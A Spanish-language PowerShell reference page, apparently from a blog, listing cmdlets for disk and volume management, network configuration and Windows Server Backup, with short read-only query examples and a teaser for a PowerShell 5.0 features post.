Get-InitiatorPort

Get-MaskingSet

Get-OffloadDataTransferSetting

Get-Partition

Get-PartitionSupportedSize

Get-PhysicalDisk

Get-ResiliencySetting

Get-StorageEnclosure

Get-StorageEnclosureVendorData

Get-StorageJob

Get-StorageNode

Get-StoragePool

Get-StorageProvider

Get-StorageReliabilityCounter

Get-StorageSetting

Get-StorageSubSystem

Get-StorageTier

Get-StorageTierSupportedSize

Get-SupportedClusterSizes

Get-SupportedFileSystems

Get-TargetPort

Get-TargetPortal

Get-VirtualDisk

Get-VirtualDiskSupportedSize

Get-Volume

Get-VolumeCorruptionCount

Get-VolumeScrubPolicy

Hide-VirtualDisk

Initialize-Disk

Mount-DiskImage

New-MaskingSet

New-Partition

New-StoragePool

New-StorageSubsystemVirtualDisk

New-StorageTier

New-VirtualDisk

New-VirtualDiskClone

New-VirtualDiskSnapshot

New-Volume

Optimize-Volume

Remove-InitiatorId

Remove-InitiatorIdFromMaskingSet

Remove-MaskingSet

Remove-Partition

Remove-PartitionAccessPath

Remove-PhysicalDisk

Remove-StoragePool

Remove-StorageTier

Remove-TargetPortFromMaskingSet

Remove-VirtualDisk

Remove-VirtualDiskFromMaskingSet

Rename-MaskingSet

Repair-FileIntegrity

Repair-VirtualDisk

Repair-Volume

Reset-PhysicalDisk

Reset-StorageReliabilityCounter

Resize-Partition

Resize-StorageTier

Resize-VirtualDisk

Set-Disk

Set-FileIntegrity

Set-FileStorageTier

Set-InitiatorPort

Set-Partition

Set-PhysicalDisk

Set-ResiliencySetting

Set-StoragePool

Set-StorageProvider

Set-StorageSetting

Set-StorageSubSystem

Set-StorageTier

Set-VirtualDisk

Set-Volume

Set-VolumeScrubPolicy

Show-VirtualDisk

Unregister-StorageSubsystem

Update-Disk

Update-HostStorageCache

Update-StoragePool

Update-StorageProviderCache

Write-VolumeCache

Get-WmiObject -Class win32_DiskDrive

Get-WmiObject win32_volume

Get-WmiObject -Class win32_logicalDisk

Ejemplos

#Crear un disco virtual
New-VirtualDisk –Path d:\disc.vhdx –SizeBytes 1GB

#Mostrar información sobre los discos
Get-WmiObject -Class win32_DiskDrive

#Comprobar el espacio de las unidades
Get-WmiObject win32_volume -computername . | select name, @{expression={$_.capacity/1GB}}, @{expression={$_.freespace/1GB}}, @{name=”% Free”;expression={$_.freespace/$_.capacity*100}}

#Mostrar los nombres de las unidades de los discos lógicos
Get-WmiObject -Class win32_logicalDisk | Select-Object DeviceID

#Crear un disco virtual

New-VirtualDisk –Path d:\disc.vhdx –SizeBytes 1GB

#Mostrar información sobre los discos

Get-WmiObject -Class win32_DiskDrive

#Comprobar el espacio de las unidades

Get-WmiObject win32_volume -computername . | select name, @{expression={$_.capacity/1GB}}, @{expression={$_.freespace/1GB}}, @{name=”% Free”;expression={$_.freespace/$_.capacity*100}}

#Mostrar los nombres de las unidades de los discos lógicos

Get-WmiObject -Class win32_logicalDisk | Select-Object DeviceID

Gestión de la red

Find-NetRoute
Get-DnsClient
Get-DnsClientCache
Get-DnsClientGlobalSetting
Get-DnsClientNrptGlobal
Get-DnsClientNrptPolicy
Get-DnsClientNrptRule
Get-DnsClientServerAddress
Get-NetAdapter
Get-NetAdapterBinding
Get-NetAdapterHardwareInfo
Get-NetAdapterStatistics
Get-NetCompartment
Get-NetFirewallAddressFilter
Get-NetFirewallApplicationFilter
Get-NetFirewallInterfaceFilter
Get-NetFirewallInterfaceTypeFilter
Get-NetFirewallPortFilter
Get-NetFirewallProfile
Get-NetFirewallRule
Get-NetFirewallSecurityFilter
Get-NetFirewallServiceFilter
Get-NetFirewallSetting
Get-NetIPAddress
Get-NetIPConfiguration
Get-NetIPInterface
Get-NetIPv4Protocol
Get-NetIPv6Protocol
Get-NetNat
Get-NetNatExternalAddress
Get-NetNatGlobal
Get-NetNatSession
Get-NetNatStaticMapping
Get-NetNatTransitionConfiguration
Get-NetNatTransitionMonitoring
Get-NetNeighbor
Get-NetOffloadGlobalSetting
Get-NetPrefixPolicy
Get-NetRoute
Get-NetTCPConnection
Get-NetTCPSetting
Get-NetTransportFilter
Get-NetUDPEndpoint
Get-NetUDPSetting
New-NetIPAddress
New-NetNeighbor
New-NetRoute
New-NetTransportFilter
Remove-NetIPAddress
Remove-NetNeighbor
Remove-NetRoute
Remove-NetTransportFilter
Set-NetIPAddress
Set-NetIPInterface
Set-NetIPv4Protocol
Set-NetIPv6Protocol
Set-NetNeighbor
Set-NetOffloadGlobalSetting
Set-NetRoute
Set-NetTCPSetting
Set-NetUDPSetting
Test-NetConnection

Get-WmiObject-ClassWin32_NetworkAdapterConfiguration

Find-NetRoute

Get-DnsClient

Get-DnsClientCache

Get-DnsClientGlobalSetting

Get-DnsClientNrptGlobal

Get-DnsClientNrptPolicy

Get-DnsClientNrptRule

Get-DnsClientServerAddress

Get-NetAdapter

Get-NetAdapterBinding

Get-NetAdapterHardwareInfo

Get-NetAdapterStatistics

Get-NetCompartment

Get-NetFirewallAddressFilter

Get-NetFirewallApplicationFilter

Get-NetFirewallInterfaceFilter

Get-NetFirewallInterfaceTypeFilter

Get-NetFirewallPortFilter

Get-NetFirewallProfile

Get-NetFirewallRule

Get-NetFirewallSecurityFilter

Get-NetFirewallServiceFilter

Get-NetFirewallSetting

Get-NetIPAddress

Get-NetIPConfiguration

Get-NetIPInterface

Get-NetIPv4Protocol

Get-NetIPv6Protocol

Get-NetNat

Get-NetNatExternalAddress

Get-NetNatGlobal

Get-NetNatSession

Get-NetNatStaticMapping

Get-NetNatTransitionConfiguration

Get-NetNatTransitionMonitoring

Get-NetNeighbor

Get-NetOffloadGlobalSetting

Get-NetPrefixPolicy

Get-NetRoute

Get-NetTCPConnection

Get-NetTCPSetting

Get-NetTransportFilter

Get-NetUDPEndpoint

Get-NetUDPSetting

New-NetIPAddress

New-NetNeighbor

New-NetRoute

New-NetTransportFilter

Remove-NetIPAddress

Remove-NetNeighbor

Remove-NetRoute

Remove-NetTransportFilter

Set-NetIPAddress

Set-NetIPInterface

Set-NetIPv4Protocol

Set-NetIPv6Protocol

Set-NetNeighbor

Set-NetOffloadGlobalSetting

Set-NetRoute

Set-NetTCPSetting

Set-NetUDPSetting

Test-NetConnection

Get-WmiObject-ClassWin32_NetworkAdapterConfiguration

Ejemplos

#Información sobre conexiones
#https://www.jesusninoc.com/2015/11/13/cmdlets-for-tcpip-model-layers/
Get-NetAdapterHardwareInfo
Get-NetAdapter -Physical
Get-NetNeighbor
Get-NetAdapterStatistics
Get-NetAdapter | Select-Object Name,MacAddress
Get-NetAdapter | Select-Object Name,MacAddress
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress
Get-NetAdapter | Select-Object Name,MacAddress
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress
((Get-NetAdapterBinding).DisplayName) -match 'Protocolo de Internet'
(Get-NetIPInterface) | Select-Object InterfaceAlias,AddressFamily
Get-NetIPv4Protocol
Get-NetIPv6Protocol
Get-NetRoute
Get-NetNat
Get-NetNatExternalAddress
Get-NetNatGlobal
Get-NetNatSession
Get-NetNatStaticMapping
Get-NetNatTransitionConfiguration
Get-NetNatTransitionMonitoring
Get-NetFirewallAddressFilter
Get-NetFirewallApplicationFilter
Get-NetFirewallInterfaceFilter
Get-NetFirewallInterfaceTypeFilter
Get-NetFirewallPortFilter
Get-NetFirewallProfile
Get-NetFirewallRule
Get-NetFirewallSecurityFilter
Get-NetFirewallServiceFilter
Get-NetFirewallSetting
Get-NetTCPSetting
Get-NetTCPConnection
Get-NetTCPConnection | Select-Object LocalPort,Remoteport
Get-NetUDPSetting
Get-NetUDPEndpoint
(Get-NetUDPEndpoint).LocalPort
Get-DnsClient
Get-DnsClientCache
Get-DnsClientGlobalSetting
Get-DnsClientNrptGlobal
Get-DnsClientNrptPolicy
Get-DnsClientNrptRule
Get-DnsClientServerAddress

#Información sobre conexiones

#https://www.jesusninoc.com/2015/11/13/cmdlets-for-tcpip-model-layers/

Get-NetAdapterHardwareInfo

Get-NetAdapter -Physical

Get-NetNeighbor

Get-NetAdapterStatistics

Get-NetAdapter | Select-Object Name,MacAddress

Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress

Get-NetAdapter | Select-Object Name,MacAddress

Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress

((Get-NetAdapterBinding).DisplayName) -match 'Protocolo de Internet'

(Get-NetIPInterface) | Select-Object InterfaceAlias,AddressFamily

Get-NetIPv4Protocol

Get-NetIPv6Protocol

Get-NetRoute

Get-NetNat

Get-NetNatExternalAddress

Get-NetNatGlobal

Get-NetNatSession

Get-NetNatStaticMapping

Get-NetNatTransitionConfiguration

Get-NetNatTransitionMonitoring

Get-NetFirewallAddressFilter

Get-NetFirewallApplicationFilter

Get-NetFirewallInterfaceFilter

Get-NetFirewallInterfaceTypeFilter

Get-NetFirewallPortFilter

Get-NetFirewallProfile

Get-NetFirewallRule

Get-NetFirewallSecurityFilter

Get-NetFirewallServiceFilter

Get-NetFirewallSetting

Get-NetTCPSetting

Get-NetTCPConnection

Get-NetTCPConnection | Select-Object LocalPort,Remoteport

Get-NetUDPSetting

Get-NetUDPEndpoint

(Get-NetUDPEndpoint).LocalPort

Get-DnsClient

Get-DnsClientCache

Get-DnsClientGlobalSetting

Get-DnsClientNrptGlobal

Get-DnsClientNrptPolicy

Get-DnsClientNrptRule

Get-DnsClientServerAddress

Copias de seguridad

Add-WBBackupTarget
Add-WBBareMetalRecovery
Add-WBFileSpec
Add-WBSystemState
Add-WBVirtualMachine
Add-WBVolume
Get-WBBackupSet
Get-WBBackupTarget
Get-WBBackupVolumeBrowsePath
Get-WBBareMetalRecovery
Get-WBDisk
Get-WBFileSpec
Get-WBJob
Get-WBPerformanceConfiguration
Get-WBPolicy
Get-WBSchedule
Get-WBSummary
Get-WBSystemState
Get-WBVirtualMachine
Get-WBVolume
Get-WBVssBackupOption
New-WBBackupTarget
New-WBFileSpec
New-WBPolicy
Remove-WBBackupSet
Remove-WBBackupTarget
Remove-WBBareMetalRecovery
Remove-WBCatalog
Remove-WBFileSpec
Remove-WBPolicy
Remove-WBSystemState
Remove-WBVirtualMachine
Remove-WBVolume
Restore-WBCatalog
Resume-WBBackup
Resume-WBVolumeRecovery
Set-WBPerformanceConfiguration
Set-WBPolicy
Set-WBSchedule
Set-WBVssBackupOption
Start-WBApplicationRecovery
Start-WBBackup
Start-WBFileRecovery
Start-WBHyperVRecovery
Start-WBSystemStateRecovery
Start-WBVolumeRecovery
Stop-WBJob

Add-WBBackupTarget

Add-WBBareMetalRecovery

Add-WBFileSpec

Add-WBSystemState

Add-WBVirtualMachine

Add-WBVolume

Get-WBBackupSet

Get-WBBackupTarget

Get-WBBackupVolumeBrowsePath

Get-WBBareMetalRecovery

Get-WBDisk

Get-WBFileSpec

Get-WBJob

Get-WBPerformanceConfiguration

Get-WBPolicy

Get-WBSchedule

Get-WBSummary

Get-WBSystemState

Get-WBVirtualMachine

Get-WBVolume

Get-WBVssBackupOption

New-WBBackupTarget

New-WBFileSpec

New-WBPolicy

Remove-WBBackupSet

Remove-WBBackupTarget

Remove-WBBareMetalRecovery

Remove-WBCatalog

Remove-WBFileSpec

Remove-WBPolicy

Remove-WBSystemState

Remove-WBVirtualMachine

Remove-WBVolume

Restore-WBCatalog

Resume-WBBackup

Resume-WBVolumeRecovery

Set-WBPerformanceConfiguration

Set-WBPolicy

Set-WBSchedule

Set-WBVssBackupOption

Start-WBApplicationRecovery

Start-WBBackup

Start-WBFileRecovery

Start-WBHyperVRecovery

Start-WBSystemStateRecovery

Start-WBVolumeRecovery

Stop-WBJob

Reparación del sistema […]

Database PowerShell Servers Web

New features in Windows PowerShell 5.0

02/12/201409/02/2016

New features in Windows PowerShell Starting in Windows PowerShell 5.0, you can develop by using classes, by using formal syntax and semantics that are similar to other object-oriented programming languages. Class, Enum, and other keywords have been added to the Windows PowerShell language to support the new feature. For more information about working with classes, see about_Classes. In collaboration with Microsoft Research, a new cmdlet, ConvertFrom-String, has been added. ConvertFrom-String lets you extract and parse structured objects from the content of text strings. For more information, see ConvertFrom-String. A new module, Microsoft.PowerShell.Archive, includes cmdlets that let you compress files and […]

Older Posts